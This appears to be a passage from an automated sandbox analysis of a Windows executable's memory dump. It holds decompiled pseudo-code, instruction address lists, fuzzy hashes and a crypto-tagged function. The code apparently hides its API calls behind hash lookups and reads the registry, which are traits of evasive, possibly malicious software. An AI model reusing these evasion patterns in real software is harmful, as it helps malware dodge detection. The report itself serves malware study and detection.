									if(_t343 > 0) {
										_t427 = (_t343 >> 5 >> 0x1a) + _t343 >> 6;
										_v72 = _t427;
										_t344 = _t343 & 0x8000003f;
										if(_t344 < 0) {
											_t344 = (_t344 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t429 = _t427 + (0 | _t344 > 0x00000000) << 6;
										_v72 = _t429;
										_push(_t429);
										_v64 = _t488;
										_t347 = E00411030();
										_t488 = _v64;
										_v32 = _t347;
										_t542 = _t542 + 4;
										_t348 =  *_t488;
										_v68 = _t348;
										if(_t348 == 0) {
											 *_v32 = 0;
										} else {
											if(_v32 != 0) {
												_t354 =  *_t348;
												_t433 = _v32;
												 *_t433 = _t354;
												if(_t354 != 0) {
													_v84 = _t523;
													_t355 = 0;
													_v40 = _t387;
													_v44 = _t509;
													_t395 = _v68;
													_t528 = _t433;
													while(1) {
														_t355 = _t355 + 1;
														_t434 =  *((char*)(_t395 + _t355 * 2 - 1));
														 *((char*)(_t528 + _t355 * 2 - 1)) = _t434;
														if(_t434 == 0) {
															break;
														}
														_t435 =  *((char*)(_t395 + _t355 * 2));
														 *((char*)(_t528 + _t355 * 2)) = _t435;
														if(_t435 != 0) {
															continue;
														}
														break;
													}
													_t523 = _v84;
													_t387 = _v40;
													_t509 = _v44;
												}
											}
											_push(1);
											_push(_v68);
											_v64 = _t488;
											E004110B0();
											_t488 = _v64;
											_t542 = _t542 + 8;
										}
										_t488[1] = _v72;
										 *_t488 = _v32;
									} else {
										_v32 = 0;
									}
									if(_v32 != 0 && _t523 != 0) {
										_v40 = _t387;
										_t431 = 0;
										_v44 = _t509;
										_t394 = _v32;
										_t515 = _v36;
										while(1) {
											_t431 = _t431 + 1;
											_t351 =  *((char*)(_t431 + _t523 - 1));
											 *((char*)(_t431 + _t394 - 1)) = _t351;
											if(_t515 != 0 && _t431 == _t515) {
												break;
											}
											if(_t351 != 0) {
												continue;
											} else {
												_t387 = _v40;
												_t509 = _v44;
											}
											goto L126;
										}
										_t387 = _v40;
										_t509 = _v44;
										 *((char*)(_t431 + _v32)) = 0;
									}
								}
							}
							L126:
							 *(_v52 + _v24 * 4) = _t488;
							_v56 = _v56 + 1;
							_push(1);
							_push(_t523);
							E004110B0();
							_t537 = _t542 + 8;
							_t509 = _t509 + _t387 + _v28;
							_t386 = E00425A90(_t509, _a8);
						} while (_t386 != 0);
						_t531 = _a4;
						E004237E0( &_v56, _t509, _v56);
						 *_t531 = 0;
						_t531[1] = 0;
						_t531[2] = 0;
						E00423B00(_t531,  &_v56);
						_t512 = _v68;
						_v68 = 0;
						_v60 = 0;
						_t496 = _v64;
						if(_t512 > 0) {
							_t321 = _t512 >> 1;
							if(_t321 == 0) {
								_t322 = 1;
							} else {
								_t392 = 0;
								_t533 = _t321;
								do {
									_t440 =  *((intOrPtr*)(_t496 + _t392 * 8));
									if( *((intOrPtr*)(_t496 + _t392 * 8)) != 0) {
										_push(1);
										E004187B0(_t440);
										_t496 = _v56;
									}
									_t441 =  *((intOrPtr*)(_t496 + 4 + _t392 * 8));
									if( *((intOrPtr*)(_t496 + 4 + _t392 * 8)) != 0) {
										_push(1);
										E004187B0(_t441);
										_t496 = _v56;
									}
									_t392 = _t392 + 1;
								} while (_t392 < _t533);
								_t531 = _a4;
								_t196 = _t392 + 1; // 0x2
								_t322 = _t392 + _t196;
							}
							_t197 = _t322 - 1; // 0x1
							if(_t197 < _t512) {
								_t439 =  *((intOrPtr*)(_t496 + _t322 * 4 - 4));
								if( *((intOrPtr*)(_t496 + _t322 * 4 - 4)) != 0) {
									_push(1);
									E004187B0(_t439);
									_t496 = _v56;
								}
							}
						}
						_push(4);
						_push(_t496);
						E004110B0();
						_v52 = 0;
						return _t531;
					}
				}
			}

0x004250a9
0x004250ac
0x004250ae
0x004250b1
0x004250b6
0x004250c1
0x004250c3
0x004250c9
0x004250ce
0x004250d0
0x004250d3
0x004250da
0x004250df
0x004250e1
0x004250e6
0x004252bd
0x004250ec
0x004250ec
0x004250f0
0x004250f2
0x004250f7
0x00425265
0x0042526c
0x0042526e
0x00425271
0x00425275
0x004252af
0x00425277
0x00425279
0x0042527b
0x0042527e
0x00425282
0x00425284
0x00425286
0x00425286
0x00425287
0x0042528c
0x00425292
0x00000000
0x00000000
0x00425294
0x00425298
0x0042529d
0x00000000
0x00000000
0x00000000
0x0042529d
0x0042529f
0x0042529f
0x00425282
0x004252a2
0x004252a4
0x004252a5
0x004252aa
0x004252aa
0x004252b2
0x004252b4
0x00425106
0x00425108
0x0042510b
0x0042511f
0x00425123
0x0042512f
0x00425135
0x00425135
0x0042513a
0x0042513e
0x00425144
0x00000000
0x00000000
0x0042514a
0x0042514f
0x00000000
0x00425151
0x00425157
0x00425168
0x00425168
0x00000000
0x00425159
0x0042515f
0x00425166
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00425166
0x00425159
0x00425157
0x00000000
0x0042514f
0x00425800
0x00425803
0x0042510d
0x0042510f
0x00425111
0x00425114
0x0042511a
0x0042511d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042511d
0x00425114
0x0042516d
0x00425172
0x00425178
0x0042517d
0x00425190
0x00425193
0x00425197
0x0042519d
0x004251a5
0x004251a5
0x004251b2
0x004251b5
0x004251b9
0x004251ba
0x004251be
0x004251c3
0x004251c7
0x004251ca
0x004251cc
0x004251d2
0x00425231
0x004251d4
0x004251d6
0x004251d8
0x004251db
0x004251df
0x004251e1
0x004251e4
0x004251e6
0x004251ea
0x004251ee
0x004251ee
0x004251ef
0x004251f4
0x004251fa
0x00000000
0x00000000
0x004251fc
0x00425200
0x00425205
0x00000000
0x00000000
0x00000000
0x00425205
0x00425207
0x0042520a
0x0042520e
0x0042520e
0x004251df
0x00425211
0x00425213
0x00425217
0x0042521b
0x0042521f
0x00425224
0x00425228
0x0042522c
0x0042522c
0x00425238
0x0042523b
0x0042517f
0x0042517f
0x0042517f
0x0042523f
0x00425243
0x00425249
0x00425249
0x0042524c
0x0042524d
0x00425251
0x00000000
0x00000000
0x0042525d
0x004257f8
0x00425263
0x00425247
0x00425248
0x00000000
0x00425248
0x00000000
0x0042525d
0x004257ec
0x004257ef
0x004257ef
0x0042523f
0x004250f7
0x004252bf
0x004252c4
0x004252cf
0x004252d2
0x004252d2
0x004252d6
0x004252db
0x004252e0
0x00425865
0x00425867
0x0042586d
0x00425872
0x00425874
0x00425877
0x0042587e
0x00425883
0x00425885
0x0042588a
0x00425a59
0x00425890
0x00425890
0x00425894
0x00425896
0x0042589b
0x00425a01
0x00425a08
0x00425a0a
0x00425a0d
0x00425a11
0x00425a4b
0x00425a13
0x00425a15
0x00425a17
0x00425a1a
0x00425a1e
0x00425a20
0x00425a22
0x00425a22
0x00425a23
0x00425a28
0x00425a2e
0x00000000
0x00000000
0x00425a30
0x00425a34
0x00425a39
0x00000000
0x00000000
0x00000000
0x00425a39
0x00425a3b
0x00425a3b
0x00425a1e
0x00425a3e
0x00425a40
0x00425a41
0x00425a46
0x00425a46
0x00425a4e
0x00425a50
0x004258aa
0x004258ac
0x004258af
0x004258c3
0x004258c7
0x004258d3
0x004258d9
0x004258d9
0x004258de
0x004258e2
0x004258e8
0x00000000
0x00000000
0x004258ee
0x004258f3
0x00000000
0x004258f5
0x004258fb
0x0042590c
0x0042590c
0x00000000
0x004258fd
0x00425903
0x0042590a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042590a
0x004258fd
0x004258fb
0x00000000
0x004258f3
0x00425a7c
0x00425a7f
0x004258b1
0x004258b3
0x004258b5
0x004258b8
0x004258be
0x004258c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004258c1
0x004258b8
0x00425911
0x00425916
0x0042591c
0x00425921
0x00425934
0x00425937
0x0042593b
0x00425941
0x00425949
0x00425949
0x00425956
0x00425959
0x0042595d
0x0042595e
0x00425962
0x00425967
0x0042596b
0x0042596e
0x00425970
0x00425976
0x004259d5
0x00425978
0x0042597a
0x0042597c
0x0042597f
0x00425983
0x00425985
0x00425988
0x0042598a
0x0042598e
0x00425992
0x00425992
0x00425993
0x00425998
0x0042599e
0x00000000
0x00000000
0x004259a0
0x004259a4
0x004259a9
0x00000000
0x00000000
0x00000000
0x004259a9
0x004259ab
0x004259ae
0x004259b2
0x004259b2
0x00425983
0x004259b5
0x004259b7
0x004259bb
0x004259bf
0x004259c3
0x004259c8
0x004259cc
0x004259d0
0x004259d0
0x004259dc
0x004259df
0x00425923
0x00425923
0x00425923
0x004259e3
0x004259e7
0x004259ed
0x004259ed
0x004259f0
0x004259f1
0x004259f5
0x00000000
0x00000000
0x004259fd
0x00425a77
0x004259ff
0x004259eb
0x004259ec
0x00000000
0x004259ec
0x00000000
0x004259fd
0x00425a6e
0x00425a71
0x00425a71
0x004259e3
0x0042589b
0x00425a5b
0x00425a60
0x00425a6b
0x004252e6
0x004252e8
0x004252ea
0x004252ee
0x004252f2
0x004252f6
0x004252f9
0x0042530f
0x00425313
0x0042531f
0x00425325
0x00425325
0x0042532a
0x0042532e
0x00425334
0x00000000
0x00000000
0x0042533a
0x0042533f
0x00000000
0x00425341
0x0042534a
0x0042535b
0x0042535b
0x00000000
0x0042534c
0x00425352
0x00425359
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00425359
0x0042534c
0x0042534a
0x00000000
0x0042533f
0x0042584f
0x00425855
0x004252fb
0x004252fd
0x00425300
0x0042530a
0x0042530d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042530d
0x0042585c
0x0042585c
0x00425360
0x00425360
0x00425364
0x00425366
0x00425366
0x00425368
0x004253dd
0x004253e4
0x004253e6
0x004253e9
0x00425373
0x00425378
0x0042537e
0x00425383
0x00425393
0x00425396
0x0042539c
0x004253a4
0x004253a4
0x004253b1
0x004253b7
0x004253b9
0x004253bc
0x004253c1
0x004253c3
0x004253c5
0x004253c5
0x004253c6
0x004253cb
0x004253d1
0x00000000
0x00000000
0x004253d9
0x00000000
0x00000000
0x004253db
0x00000000
0x004253d9
0x0042580a
0x0042580a
0x00425385
0x00425385
0x00425385
0x00425383
0x004253ec
0x004253ec
0x004253f4
0x004253f9
0x004253fc
0x00425400
0x00425406
0x0042540b
0x00425416
0x0042541c
0x00425430
0x00425435
0x00425437
0x0042543b
0x00425440
0x00425447
0x0042544b
0x0042544b
0x0042544f
0x00425453
0x00425469
0x0042546e
0x0042546e
0x00425471
0x00425478
0x0042547a
0x0042547f
0x00425701
0x00425485
0x00425487
0x00425489
0x0042548e
0x00425668
0x0042566a
0x0042566e
0x00425673
0x00425677
0x0042567b
0x0042567e
0x00425680
0x00425686
0x004256ef
0x00425688
0x0042568d
0x0042568f
0x00425693
0x00425696
0x0042569a
0x0042569c
0x0042569f
0x004256a1
0x004256a5
0x004256a9
0x004256ad
0x004256af
0x004256af
0x004256b0
0x004256b5
0x004256bb
0x00000000
0x00000000
0x004256bd
0x004256c1
0x004256c6
0x00000000
0x00000000
0x00000000
0x004256c6
0x004256c8
0x004256cb
0x004256cf
0x004256cf
0x0042569a
0x004256d3
0x004256d5
0x004256d9
0x004256dd
0x004256e2
0x004256e6
0x004256e6
0x004256f6
0x004256f8
0x0042549d
0x0042549f
0x004254a2
0x004254c4
0x004254c8
0x004254d4
0x004254d9
0x004254dd
0x004254e1
0x004254e3
0x004254e3
0x004254e8
0x004254ec
0x004254f2
0x00000000
0x00000000
0x004254f8
0x004254fd
0x00000000
0x004254ff
0x004254ff
0x00425503
0x0042550f
0x00425527
0x00425527
0x00425511
0x00425511
0x00425515
0x0042551f
0x00425525
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00425525
0x00000000
0x00425515
0x0042550f
0x00000000
0x004254fd
0x00425831
0x00425836
0x0042583a
0x004254a4
0x004254a4
0x004254ae
0x004254b2
0x004254b5
0x004254bf
0x004254c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004254c2
0x00425828
0x00425828
0x00425828
0x0042552f
0x0042553e
0x00425543
0x0042555c
0x0042555f
0x00425563
0x00425568
0x00425570
0x00425570
0x0042557d
0x00425580
0x00425584
0x00425585
0x00425589
0x0042558e
0x00425592
0x00425596
0x00425599
0x0042559b
0x004255a1
0x0042560c
0x004255a3
0x004255a8
0x004255ac
0x004255af
0x004255b3
0x004255b7
0x004255b9
0x004255bc
0x004255be
0x004255c2
0x004255c6
0x004255ca
0x004255cc
0x004255cc
0x004255cd
0x004255d2
0x004255d8
0x00000000
0x00000000
0x004255da
0x004255de
0x004255e3
0x00000000
0x00000000
0x00000000
0x004255e3
0x004255e5
0x004255e8
0x004255ec
0x004255ec
0x004255b7
0x004255f0
0x004255f2
0x004255f6
0x004255fa
0x004255ff
0x00425603
0x00425603
0x00425617
0x0042561a
0x00425545
0x00425545
0x00425545
0x00425621
0x0042562f
0x00425633
0x00425635
0x00425639
0x0042563d
0x00425641
0x00425641
0x00425642
0x00425647
0x0042564d
0x00000000
0x00000000
0x00425659
0x00000000
0x0042565b
0x0042565b
0x0042565f
0x0042565f
0x00000000
0x00425659
0x00425817
0x0042581b
0x0042581f
0x0042581f
0x00425621
0x0042548e
0x00425703
0x0042570b
0x0042570e
0x00425712
0x00425714
0x00425715
0x0042571a
0x00425721
0x0042572d
0x0042572f
0x00425737
0x00425745
0x0042574f
0x00425751
0x00425754
0x00425757
0x0042575c
0x00425762
0x00425766
0x0042576a
0x00425770
0x00425774
0x00425776
0x00425843
0x0042577c
0x0042577c
0x0042577e
0x00425780
0x00425780
0x00425785
0x00425787
0x00425789
0x0042578e
0x0042578e
0x00425792
0x00425798
0x0042579a
0x0042579c
0x004257a1
0x004257a1
0x004257a5
0x004257a6
0x004257aa
0x004257ad
0x004257ad
0x004257ad
0x004257b1
0x004257b6
0x004257b8
0x004257be
0x004257c0
0x004257c2
0x004257c7
0x004257c7
0x004257be
0x004257b6
0x004257cb
0x004257cd
0x004257ce
0x004257d6
0x004257e9
0x004257e9
0x004252e0

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction ID: b6d61d86942261c1321440b41e842b3507daa212f9d720e9a135f929fee7974f
Opcode Fuzzy Hash: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction Fuzzy Hash: 6A621874708B629FD715CF28D48072BBBE2AFC5310F98866EE8958B351D779C841CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00415B60, Relevance: .8, Instructions: 810
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00415B60(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr* _t250;
				signed int _t255;
				signed int _t265;
				signed int _t268;
				signed int _t275;
				signed int _t278;
				signed int _t281;
				signed int _t285;
				signed int _t290;
				signed int _t292;
				signed int _t293;
				void* _t294;
				void* _t297;
				signed int _t302;
				signed int _t305;
				signed int _t313;
				signed int _t320;
				signed int _t325;
				signed int _t330;
				signed int _t333;
				signed int _t338;
				signed int _t363;
				signed int _t371;
				signed int _t380;
				signed int _t383;
				signed int _t388;
				signed int _t398;
				void* _t401;
				signed int _t404;
				signed int _t405;
				signed int _t407;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t452;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t535;
				signed int _t550;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t560;
				void* _t561;
				signed int _t562;
				void* _t565;
				signed short* _t566;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				void* _t572;
				signed int* _t573;
				signed int* _t575;

				_t558 = __esi;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_push(_t565);
				_t573 = _t572 - 0xfc;
				_t550 = __ecx;
				E00432970(__ebx, __ecx, __ecx);
				_push(0);
				E00429350( &(_t573[6]));
				_push(0);
				E00429350( &(_t573[0xb]));
				E00429670( &(_t573[7]), E00429650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E00429640( &(_t573[7]), E00429650( &(_t573[6])) + 0xfffffffc))) = 0x4f6a34b4;
				E00429670( &(_t573[7]), E00429650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E00429640( &(_t573[7]), E00429650( &(_t573[6])) + 0xfffffffc))) = 0x52375f3;
				E00429670( &(_t573[7]), E00429650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E00429640( &(_t573[7]), E00429650( &(_t573[6])) + 0xfffffffc))) = 0xda7c7ca2;
				E00429670( &(_t573[7]), E00429650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E00429640( &(_t573[7]), E00429650( &(_t573[6])) + 0xfffffffc))) = 0x795cb255;
				E00429670( &(_t573[7]), E00429650( &(_t573[6])) + 4);
				_t250 = E00429640( &(_t573[7]), E00429650( &(_t573[6])) + 0xfffffffc);
				_push(0);
				 *_t250 = 0x9fbb14a6;
				E0042C550(__ebx,  &(_t573[0x17]), __esi, _t565,  &(_t573[8]), 0x80000002);
				_t521 =  *0x43b1f4; // 0x2491340
				if(_t521 == 0xc139578) {
					 *0x43b1f4 = 0;
					goto L6;
				} else {
					if(_t521 == 0) {
						L6:
						_push(0xa1310f65);
						_t403 = E00417564(0xa1310f65);
						if(_t403 == 0) {
							_t255 = E00416C50(0xa1310f65);
							__eflags = _t255;
							if(_t255 != 0) {
								_push(0xa1310f65);
								_t403 = E00417564(0xa1310f65);
							}
						}
						if(_t403 == 0) {
							goto L11;
						} else {
							_t573 =  &(_t573[0xfffffffffffffffe]);
							_t398 = E004167C8(_t403, 0xf95c938e);
							goto L9;
						}
					} else {
						do {
							_t403 = 0;
							_t401 = 0;
							while( *((intOrPtr*)(_t401 + _t521 + 8)) != 0xf95c938e) {
								_t403 =  &(_t403[0]);
								_t401 = _t401 + 0x18;
								if(_t403 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L162;
							}
							_t398 =  *(_t401 + _t521 + 0x14);
							__eflags = _t398;
							if(_t398 != 0) {
								L9:
								if(_t398 == 0) {
									L11:
									_t566 = 0;
									__eflags = 0;
									_t573[3] = _t550;
									while(1) {
										__eflags =  *_t566 & 0x0000ffff;
										if(( *_t566 & 0x0000ffff) == 0) {
											break;
										}
										E00418AB0( &(_t573[0x38]), _t566, 0);
										_t383 = E00420180(_t573[0x36], 0x7fffffff, _t558);
										_t403 =  &(_t573[0x38]);
										_t566 = _t566 + 2 + _t383 * 2;
										E0041A660( &(_t573[0x38]), __eflags,  &(_t573[0x38]), 0x3d);
										E0041A0D0( &(_t573[0x38]),  &(_t573[0x3a]));
										E004183B0( &(_t573[0x3c]));
										_t388 = E0042D620(_t573[0x3c], E00426040(_t573[0x3c], 0x7fffffff));
										E00420B10( &(_t573[0x3c]));
										E00418CA0( &(_t573[0x3a]));
										_t558 = _t388 ^ 0x38ba5c7b;
										__eflags = (_t388 ^ 0x38ba5c7b) - 0x258c0aca;
										if(__eflags == 0) {
											_t551 = _t573[3];
											E0041B6F0( &(_t573[0x38]), __eflags,  &(_t573[0x29]), 0x3d);
											E00418CA0(_t403);
											E00418CA0( &(_t573[0x36]));
										} else {
											E00418CA0(_t403);
											E00418CA0( &(_t573[0x36]));
											continue;
										}
										L17:
										E004196D0( &(_t573[0x29]), 0x5c);
										E0042CE00(_t403,  &(_t573[0x15]), _t551, _t558, _t566,  &(_t573[0x2a]));
										__eflags = _t573[0x2a];
										if(_t573[0x2a] <= 0) {
											L66:
											_push(0x4c0);
											E00429350( &(_t573[3]));
											_t567 = E00429640( &(_t573[3]), 0);
											_t522 =  *0x43b1f4; // 0x2491340
											_t573[0x35] = 0;
											__eflags = _t522 - 0xc139578;
											if(_t522 == 0xc139578) {
												 *0x43b1f4 = 0;
												goto L72;
											} else {
												__eflags = _t522;
												if(_t522 == 0) {
													L72:
													_push(0x3ab7f42e);
													_t404 = E00417564(0x3ab7f42e);
													__eflags = _t404;
													if(_t404 == 0) {
														_t265 = E00416C50(0x3ab7f42e);
														__eflags = _t265;
														if(_t265 != 0) {
															_push(0x3ab7f42e);
															_t404 = E00417564(0x3ab7f42e);
														}
													}
													__eflags = _t404;
													if(_t404 != 0) {
														_t573 =  &(_t573[0xfffffffffffffffe]);
														_t407 = E004167C8(_t404, 0x87cdd143);
														goto L75;
													}
												} else {
													do {
														_t410 = 0;
														_t305 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *((intOrPtr*)(_t305 + _t522 + 8)) - 0x87cdd143;
															if( *((intOrPtr*)(_t305 + _t522 + 8)) == 0x87cdd143) {
																break;
															}
															_t410 = _t410 + 1;
															_t305 = _t305 + 0x18;
															__eflags = _t410 - 0x10;
															if(_t410 < 0x10) {
																continue;
															} else {
																goto L71;
															}
															goto L99;
														}
														_t407 =  *(_t305 + _t522 + 0x14);
														__eflags = _t407;
														if(_t407 != 0) {
															L75:
															__eflags = _t407;
															if(_t407 != 0) {
																_t285 =  *_t407(0,  &(_t573[0x2d]),  &(_t573[0x35]));
																__eflags = _t285;
																if(_t285 != 0) {
																	__eflags = _t573[0x35];
																	if(_t573[0x35] > 0) {
																		_t152 = _t567 + 0x488; // 0x488
																		_t573[0x3e] = _t152;
																		_t154 = _t567 + 0x464; // 0x464
																		_t573[0x2e] = _t154;
																		_t408 = 0;
																		__eflags = 0;
																		_t573[0x30] = _t567;
																		_t569 = 0;
																		do {
																			E00410B70(_t573[6], 0, _t573[3]);
																			_t573 =  &(_t573[3]);
																			_t560 =  *0x43b1f4; // 0x2491340
																			__eflags = _t560 - 0xc139578;
																			if(_t560 == 0xc139578) {
																				 *0x43b1f4 = 0;
																				goto L86;
																			} else {
																				__eflags = _t560;
																				if(_t560 == 0) {
																					L86:
																					_push(0x3ab7f42e);
																					_t529 = E00417564(0x3ab7f42e);
																					__eflags = _t529;
																					if(_t529 == 0) {
																						 *_t573 = _t529;
																						_t290 = E00416C50(0x3ab7f42e);
																						_t529 =  *_t573;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_push(0x3ab7f42e);
																							_t529 = E00417564(0x3ab7f42e);
																						}
																					}
																					__eflags = _t529;
																					if(_t529 != 0) {
																						_t573 =  &(_t573[0xfffffffffffffffe]);
																						_t562 = E004167C8(_t529, 0xcf247eca);
																						goto L89;
																					}
																				} else {
																					__eflags = 0;
																					do {
																						_t302 = 0;
																						_t531 = 0;
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t531 + _t560 + 8)) - 0xcf247eca;
																							if( *((intOrPtr*)(_t531 + _t560 + 8)) == 0xcf247eca) {
																								break;
																							}
																							_t302 = _t302 + 1;
																							_t531 = _t531 + 0x18;
																							__eflags = _t302 - 0x10;
																							if(_t302 < 0x10) {
																								continue;
																							} else {
																								goto L85;
																							}
																							goto L91;
																						}
																						_t562 =  *(_t531 + _t560 + 0x14);
																						__eflags = _t562;
																						if(_t562 != 0) {
																							L89:
																							__eflags = _t562;
																							if(_t562 != 0) {
																								_t297 = E00429650( &(_t573[2]));
																								 *_t562(0,  *((intOrPtr*)(_t573[0x2d] + _t408)), 8, _t573[0x32], _t297,  &(_t573[1]));
																							}
																							goto L91;
																						} else {
																							goto L86;
																						}
																						goto L99;
																						L85:
																						asm("o16 nop [eax+eax]");
																						_t161 = _t560 + 0x180; // 0x2498fa8
																						_t560 =  *_t161;
																						__eflags = _t560;
																					} while (_t560 != 0);
																					goto L86;
																				}
																			}
																			L91:
																			_t530 = _t573[0x30];
																			_t558 =  *(_t530 + 0x488) & 0x0000ffff;
																			__eflags =  *(_t530 + 0x488) & 0x0000ffff;
																			if(( *(_t530 + 0x488) & 0x0000ffff) != 0) {
																				__eflags =  *(_t551 + 4);
																				if( *(_t551 + 4) > 0) {
																					_t561 = 0;
																					_t573[0x1f] = _t408;
																					_t573[0x1e] = _t569;
																					__eflags = 0;
																					do {
																						_t409 = E00432B00(_t551, _t561);
																						_push(0);
																						_push(0);
																						_t292 = E004200B0(_t409,  *((intOrPtr*)(_t409 + 0x14)), _t573[0x40], _t551);
																						__eflags = _t292;
																						if(_t292 != 0) {
																							goto L96;
																						} else {
																							_push(0);
																							_push(0);
																							_t293 = E004200B0(_t409,  *((intOrPtr*)(_t409 + 0x1c)), _t573[0x30], _t551);
																							__eflags = _t293;
																							if(_t293 == 0) {
																								_t294 = _t409;
																								 *((char*)(_t294 + 0x3c)) = 1;
																								_t535 = _t573[0x2d];
																								_t408 = _t573[0x1f];
																								_t569 = _t573[0x1e];
																								_t558 =  *(_t535 + _t408);
																								 *(_t294 + 0x40) =  *(_t535 + _t408);
																							} else {
																								goto L96;
																							}
																						}
																						goto L98;
																						L96:
																						_t561 = _t561 + 1;
																						__eflags = _t561 -  *(_t551 + 4);
																					} while (_t561 <  *(_t551 + 4));
																					_t408 = _t573[0x1f];
																					_t569 = _t573[0x1e];
																				}
																			}
																			L98:
																			_t569 = _t569 + 1;
																			_t408 = _t408 + 0x4c;
																			__eflags = _t569 - _t573[0x35];
																		} while (_t569 < _t573[0x35]);
																	}
																}
															}
														} else {
															goto L72;
														}
														goto L99;
														L71:
														asm("o16 nop [eax+eax]");
														_t148 = _t522 + 0x180; // 0x2498fa8
														_t522 =  *_t148;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L72;
												}
											}
											L99:
											_t523 =  *0x43b1f4; // 0x2491340
											__eflags = _t523 - 0xc139578;
											if(_t523 == 0xc139578) {
												 *0x43b1f4 = 0;
												goto L105;
											} else {
												__eflags = _t523;
												if(_t523 == 0) {
													L105:
													_push(0x3ab7f42e);
													_t405 = E00417564(0x3ab7f42e);
													__eflags = _t405;
													if(_t405 == 0) {
														_t268 = E00416C50(0x3ab7f42e);
														__eflags = _t268;
														if(_t268 != 0) {
															_push(0x3ab7f42e);
															_t405 = E00417564(0x3ab7f42e);
														}
													}
													__eflags = _t405;
													if(_t405 == 0) {
														goto L110;
													} else {
														_t573 =  &(_t573[0xfffffffffffffffe]);
														_t278 = E004167C8(_t405, 0xd39512d0);
														goto L108;
													}
												} else {
													do {
														_t452 = 0;
														_t281 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *((intOrPtr*)(_t281 + _t523 + 8)) - 0xd39512d0;
															if( *((intOrPtr*)(_t281 + _t523 + 8)) == 0xd39512d0) {
																break;
															}
															_t452 = _t452 + 1;
															_t281 = _t281 + 0x18;
															__eflags = _t452 - 0x10;
															if(_t452 < 0x10) {
																continue;
															} else {
																goto L104;
															}
															goto L162;
														}
														_t278 =  *(_t281 + _t523 + 0x14);
														__eflags = _t278;
														if(_t278 != 0) {
															L108:
															__eflags = _t278;
															if(_t278 == 0) {
																L110:
																E00429510( &(_t573[2]));
																E00427560( &(_t573[0x2a]), _t551, _t558);
																E00418CA0( &(_t573[0x28]));
																E00418CA0( &(_t573[0x17]));
																__eflags = _t573[0x16];
																if(_t573[0x16] != 0) {
																	_t524 = _t573[0x15];
																	__eflags = _t524;
																	if(_t524 == 0) {
																		L114:
																		_t275 = 1;
																	} else {
																		__eflags = _t524 - 0xffffffff;
																		if(_t524 == 0xffffffff) {
																			goto L114;
																		} else {
																			_t275 = 0;
																		}
																	}
																	__eflags = _t275;
																	if(_t275 == 0) {
																		E0042BF00(_t524);
																	}
																}
																_t573[0x15] = 0;
																E00429510( &(_t573[0xa]));
																return E00429510( &(_t573[6]));
															} else {
																_push(_t573[0x2d]);
																asm("int3");
																return _t278;
															}
														} else {
															goto L105;
														}
														goto L162;
														L104:
														asm("o16 nop [eax+eax]");
														_t182 = _t523 + 0x180; // 0x2498fa8
														_t523 =  *_t182;
														__eflags = _t523;
													} while (_t523 != 0);
													goto L105;
												}
											}
										} else {
											_t571 = 0;
											__eflags = 0;
											_t573[3] = _t551;
											_t537 =  &(_t573[0x24]);
											do {
												_t411 = E00427600( &(_t573[0x2b]), _t571);
												_push(0);
												_push(_t573[0x16]);
												E0042C070( &(_t573[0x1c]), __eflags,  *_t306);
												E0042C580( &(_t573[0x1b]), _t537,  &(_t573[0x34]), 0x6fac26cf);
												_push(_t573[0x33]);
												E0042C6D0( &(_t573[0x1b]),  &(_t573[0x25]));
												E00420B10( &(_t573[0x33]));
												_t313 = E00429660( &(_t573[0x24]));
												__eflags = _t313;
												if(_t313 == 0) {
													_t573[2] = E00429640( &(_t573[0x25]), 0);
													_t573[0x31] = 0x40;
													_t573[0x32] = 0x40;
													E00418810( &(_t573[0x21]), 0x40);
													E00418810( &(_t573[0x23]), _t573[0x32]);
													_t558 =  *0x43b1f4; // 0x2491340
													__eflags = _t558 - 0xc139578;
													if(_t558 == 0xc139578) {
														 *0x43b1f4 = 0;
														goto L34;
													} else {
														__eflags = _t558;
														if(_t558 == 0) {
															L34:
															_push(0x3ab94787);
															_t573[1] = E00417564(0x3ab94787);
															__eflags = _t573[1];
															if(_t573[1] == 0) {
																_t320 = E00416C50(0x3ab94787);
																__eflags = _t320;
																if(_t320 != 0) {
																	_push(0x3ab94787);
																	_t573[1] = E00417564(0x3ab94787);
																}
															}
															__eflags = _t573[1];
															if(_t573[1] == 0) {
																goto L57;
															} else {
																_t573 =  &(_t573[0xfffffffffffffffe]);
																_t537 = 0x738dad93;
																_t553 = E004167C8(_t573[3], 0x738dad93);
																goto L37;
															}
														} else {
															__eflags = 0;
															do {
																_t554 = 0;
																_t537 = 0;
																while(1) {
																	__eflags =  *((intOrPtr*)(_t537 + _t558 + 8)) - 0x738dad93;
																	if( *((intOrPtr*)(_t537 + _t558 + 8)) == 0x738dad93) {
																		break;
																	}
																	_t554 = _t554 + 1;
